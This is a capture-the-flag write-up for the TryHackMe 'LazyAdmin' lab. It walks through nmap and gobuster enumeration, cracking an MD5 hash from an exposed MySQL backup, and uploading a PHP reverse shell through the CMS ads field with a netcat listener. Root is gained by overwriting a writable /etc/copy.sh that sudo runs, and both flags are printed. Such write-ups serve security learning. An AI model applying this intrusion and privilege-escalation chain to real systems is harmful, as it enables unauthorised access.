LazyAdmin – a tryhackme.com writeup

LazyAdmin

Another fun CTF from tryhackme.com

We don’t know anything about this box – just that we need to find the user and the root flag. Let’s strart with a classic portscan.

sudo nmap -sV 10.10.215.210

That’s not much. The website looks like a default apache/ubuntu page – the source code doesn’t reveal anything as well.

Just to not miss anything lets try gobuster

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.215.210

Ok. we have a folder called content. lets put that in the browser.

A content management system that is not properly installed. That looks promising.

Let’s run ghostbuster on the /content directory.

dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.215.210 130 ⨯
http://10.10.215.210/content

As it turns out /as is a login page. Lets look at /inc

The mysql-backup is of course what we will look at first.

As it turns out there is in deed a mysql backup in that directory:

mysql_bakup_20191129023059-1.5.1.sql

Let’s download it.

wget http://10.10.153.251/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql

Let’s just grep the file for “passwd” and see.

grep -i passwd mysql_bakup_20191129023059-1.5.1.sql

We can see a username and a hashed password:

42f749ade7f9e195bf475f37a44cafcb

hash-identifier should tell us the type of hash we are looking at.

hash-identifier 42f749ade7f9e195bf475f37a44cafcb

It’s MD5.

So we try john with our favorite password list and see if we can crack it.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 --fork=100 passwd.txt

We know know now from the mysql backup file that the username is manager and from john that the password is Password123.

After logging in we see this:

We rember from looking at /inc in the browser that there was a ads directory there.

http://10.10.153.251/content/inc/ads/

And we have an ads menu here

We can put in code here. So MAYBE if we put php code here it gets saved in the ads directory and we could then call the code through the web browser.

So let’s try a reverse shell from

/usr/share/webshells/php/php-reverse-shell.php

and copy/paste it into the code section. We change the ip address to the one of our local machine and leave the port at 1234

Let’s check in the browser.

 

That looks good. Let’s start a netcat listener on our local machine.

nc -p 1234

And then click on our file in the ads directory.

We have our shell. Lets look for user.txt

find / -name user.txt 2>/dev/null

we find it at

/home/itguy/user.txt

We just try 

cat /home/itguy/user.txt

and are lucky. We can read it and our user flag is

THM{63e5bce9271952aad1113b6f1ac28a07}

After this we do a

sudo -l

To see if that reeveals any options to get root and we find this:

The Backup script looks promising

/home/itguy/backup.pl

We cant change that file

-rw-r--r-x 1 root root 47 Nov 29 2019 /home/itguy/backup.pl

So let’s look at the code:

#!/usr/bin/perl
system("sh", "/etc/copy.sh");

So how does the copy.sh look?

ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh

Interesting – we can change that file.

We do a simple

echo "/bin/sh" > /etc/copy.sh

And then execute the perl script as root

sudo /usr/bin/perl /home/itguy/backup.pl

That worked well – so we collect the root flag.

cat /root/root.txt
THM{6637f41d0177b6f37cb20d775124699f}

Leave a Reply

Your email address will not be published.